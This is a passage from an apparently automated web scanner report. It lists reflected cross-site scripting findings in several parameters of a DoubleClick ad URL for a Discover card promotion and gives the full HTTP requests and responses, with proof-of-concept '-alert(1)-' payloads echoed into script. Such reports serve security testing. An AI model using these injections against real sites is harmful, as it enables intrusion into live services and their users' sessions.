The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc7c'-alert(1)-'e931caa6fc4 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=369835fc7c'-alert(1)-'e931caa6fc4&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4297
Date: Tue, 28 Jun 2011 02:18:22 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
tivewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=369835fc7c'-alert(1)-'e931caa6fc4&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0
...[SNIP]...

1.74. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f42d'-alert(1)-'97132edf540 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=171848565f42d'-alert(1)-'97132edf540&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:18:01 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ar dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=171848565f42d'-alert(1)-'97132edf540&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/
...[SNIP]...

1.75. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a976'-alert(1)-'0dc5b971d37 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=979566a976'-alert(1)-'0dc5b971d37&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:16:31 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= 'http://s0.2mdn.net/1796512/CB300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=979566a976'-alert(1)-'0dc5b971d37&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var target = '_blank';
var
...[SNIP]...

1.76. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3599e'-alert(1)-'ee68f7e2a73 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=13092273103599e'-alert(1)-'ee68f7e2a73&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:16:50 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
12/OpenRoad_FINAL_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=13092273103599e'-alert(1)-'ee68f7e2a73&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var
...[SNIP]...

1.77. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ef6'-alert(1)-'386b12da849 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=1575519ef6'-alert(1)-'386b12da849&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4297
Date: Tue, 28 Jun 2011 02:16:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
f = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.JPG';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=1575519ef6'-alert(1)-'386b12da849&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6'
...[SNIP]...

1.78. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae57a'-alert(1)-'cfb43500a9c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956ae57a'-alert(1)-'cfb43500a9c&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:18:40 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956ae57a'-alert(1)-'cfb43500a9c&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x25
...[SNIP]...

1.79. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c50ad'-alert(1)-'a22d8d8e435 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423c50ad'-alert(1)-'a22d8d8e435&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:19:02 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423c50ad'-alert(1)-'a22d8d8e435&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
